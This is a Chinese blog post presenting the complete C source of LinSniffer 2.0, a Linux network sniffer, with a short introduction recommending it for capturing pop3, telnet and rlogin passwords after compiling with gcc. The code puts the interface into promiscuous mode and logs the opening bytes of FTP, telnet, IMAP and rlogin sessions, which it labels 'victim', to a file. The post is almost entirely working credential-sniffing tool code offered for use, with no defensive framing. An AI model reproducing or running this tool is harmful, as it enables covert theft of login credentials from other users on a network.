linux下pop3/telnet嗅探工具
不多说,linux下的经典嗅探利器——linsniffer,短小精悍。主要用于pop3/telnet/rlogin 密码嗅探。 源代码如下,gcc编译以后即可运行。
1/*
2LinSniffer 2.0
3Lord Somer
4 - now creates a pidfile when run(deletes it upon exiting)
5 - no longer longs pop2/pop3, just uncomment the lines for em below if u wanna log them
6 - thanks to neek for help with some of the coding
7--- old ver info ---
8LinSniffer 0.03 [BETA]
9Mike Edulla
10medulla@infosoc.com
11*/
12#define TCPLOG "tcp.log"
13#define PIDFILE "sniff.pid"
14#include <sys/types.h>
15#include <sys/socket.h>
16#include <sys/time.h>
17#include <netinet/in.h>
18#include <netdb.h>
19#include <string.h>
20#include <linux/if.h>
21#include <signal.h>
22#include <stdio.h>
23#include <arpa/inet.h>
24#include <linux/socket.h>
25#include <linux/ip.h>
26#include <linux/tcp.h>
27#include <linux/if_ether.h>
28#include <sys/ioctl.h>
29int openintf(char *);
30int read_tcp(int);
31int filter(void);
32int print_header(void);
33int print_data(int, char *);
34char *hostlookup(unsigned long int);
35char fuckfuck[40];
36void clear_victim(void);
37void cleanup(int);
38struct etherpacket
39{
40 struct ethhdr eth;
41 struct iphdr ip;
42 struct tcphdr tcp;
43 char buff[8192];
44}ep;
45struct
46{
47 unsigned long saddr;
48 unsigned long daddr;
49 unsigned short sport;
50 unsigned short dport;
51 int bytes_read;
52 char active;
53 time_t start_time;
54} victim;
55struct iphdr *ip;
56struct tcphdr *tcp;
57int s;
58FILE *fp;
59#define CAPTLEN 512
60#define TIMEOUT 30
61int openintf(char *d)
62{
63 int fd;
64 struct ifreq ifr;
65 int s;
66 fd=socket(AF_INET, SOCK_PACKET, htons(0x800));
67 if(fd < 0)
68 {
69 perror("cant get SOCK_PACKET socket");
70 exit(0);
71 }
72 strcpy(ifr.ifr_name, d);
73 s=ioctl(fd, SIOCGIFFLAGS, &ifr);
74 if(s < 0)
75 {
76 close(fd);
77 perror("cant get flags");
78 exit(0);
79 }
80 ifr.ifr_flags |= IFF_PROMISC;
81 s=ioctl(fd, SIOCSIFFLAGS, &ifr);
82 if(s < 0) perror("cant set promiscuous mode");
83 return fd;
84}
85int read_tcp(int s)
86{
87 int x;
88 while(1)
89 {
90 x=read(s, (struct etherpacket *)&ep, sizeof(ep));
91 if(x > 1)
92 {
93 if(filter()==0) continue;
94 x=x-54;
95 if(x < 1) continue;
96 return x;
97 }
98 }
99}
100int filter(void)
101{
102 int p;
103 p=0;
104 if(ip->protocol != 6) return 0;
105 if(victim.active != 0)
106 if(victim.bytes_read > CAPTLEN)
107 {
108 fprintf(fp, "n----- [CAPLEN Exceeded]n");
109 clear_victim();
110 return 0;
111 }
112 if(victim.active != 0)
113 if(time(NULL) > (victim.start_time + TIMEOUT))
114 {
115 fprintf(fp, "n----- [Timed Out]n");
116 clear_victim();
117 return 0;
118 }
119 if(ntohs(tcp->dest)==21) p=1; /* ftp */
120 if(ntohs(tcp->dest)==23) p=1; /* telnet */
121/* if(ntohs(tcp->dest)==110) p=1; pop3 */
122/* if(ntohs(tcp->dest)==109) p=1; pop2 */
123 if(ntohs(tcp->dest)==143) p=1; /* imap2 */
124 if(ntohs(tcp->dest)==513) p=1; /* rlogin */
125/* if(ntohs(tcp->dest)==106) p=1; poppasswd */
126 if(victim.active == 0)
127 if(p == 1)
128 if(tcp->syn == 1)
129 {
130 victim.saddr=ip->saddr;
131 victim.daddr=ip->daddr;
132 victim.active=1;
133 victim.sport=tcp->source;
134 victim.dport=tcp->dest;
135 victim.bytes_read=0;
136 victim.start_time=time(NULL);
137 print_header();
138 }
139 if(tcp->dest != victim.dport) return 0;
140 if(tcp->source != victim.sport) return 0;
141 if(ip->saddr != victim.saddr) return 0;
142 if(ip->daddr != victim.daddr) return 0;
143 if(tcp->rst == 1)
144 {
145 victim.active=0;
146 alarm(0);
147 fprintf(fp, "n----- [RST]n");
148 clear_victim();
149 return 0;
150 }
151 if(tcp->fin == 1)
152 {
153 victim.active=0;
154 alarm(0);
155 fprintf(fp, "n----- [FIN]n");
156 clear_victim();
157 return 0;
158 }
159 return 1;
160}
161int print_header(void)
162{
163 fprintf(fp, "n");
164 fprintf(fp, "%s => ", hostlookup(ip->saddr));
165 fprintf(fp, "%s [%d]n", hostlookup(ip->daddr), ntohs(tcp->dest));
166}
167int print_data(int datalen, char *data)
168{
169 int i=0;
170 int t=0;
171 victim.bytes_read=victim.bytes_read+datalen;
172 for(i=0;i != datalen;i++)
173 {
174 if(data[i] == 13) { fprintf(fp, "n"); t=0; }
175 if(isprint(data[i])) {fprintf(fp, "%c", data[i]);t++;}
176 if(t > 75) {t=0;fprintf(fp, "n");}
177 }
178}
179main(int argc, char **argv)
180{
181 FILE *fucker;
182 fucker = fopen(PIDFILE, "w");
183 fprintf(fucker, "%dn", getpid());
184 fclose(fucker);
185 s=openintf("eth0");
186 ip=(struct iphdr *)(((unsigned long)&ep.ip)-2);
187 tcp=(struct tcphdr *)(((unsigned long)&ep.tcp)-2);
188 signal(SIGHUP, SIG_IGN);
189 signal(SIGINT, cleanup);
190 signal(SIGTERM, cleanup);
191 signal(SIGKILL, cleanup);
192 signal(SIGQUIT, cleanup);
193 if(argc == 2) fp=stdout;
194 else fp=fopen(TCPLOG, "at");
195 if(fp == NULL) { fprintf(stderr, "cant open logn");exit(0);}
196 clear_victim();
197 for(;;)
198 {
199 read_tcp(s);
200 if(victim.active != 0) print_data(htons(ip->tot_len)-sizeof(ep.ip)-sizeof(ep.tcp), ep.buff-2);
201 fflush(fp);
202 }
203 sprintf(fuckfuck,"rm %s", PIDFILE);
204 system(fuckfuck);
205}
206char *hostlookup(unsigned long int in)
207{
208 static char blah[1024];
209 struct in_addr i;
210 struct hostent *he;
211 i.s_addr=in;
212 he=gethostbyaddr((char *)&i, sizeof(struct in_addr),AF_INET);
213 if(he == NULL) strcpy(blah, inet_ntoa(i));
214 else strcpy(blah, he->h_name);
215 return blah;
216}
217void clear_victim(void)
218{
219 victim.saddr=0;
220 victim.daddr=0;
221 victim.sport=0;
222 victim.dport=0;
223 victim.active=0;
224 victim.bytes_read=0;
225 victim.start_time=0;
226}
227void cleanup(int sig)
228{
229 fprintf(fp, "Exiting...n");
230 close(s);
231 fclose(fp);
232 exit(0);
233}
捐赠本站(Donate)
如您感觉文章有用,可扫码捐赠本站!(If the article useful, you can scan the QR code to donate))
- Author: shisekong
- Link: https://blog.361way.com/linsniffer/1656.html
- License: This work is under a 知识共享署名-非商业性使用-禁止演绎 4.0 国际许可协议. Kindly fulfill the requirements of the aforementioned License when adapting or creating a derivative of this work.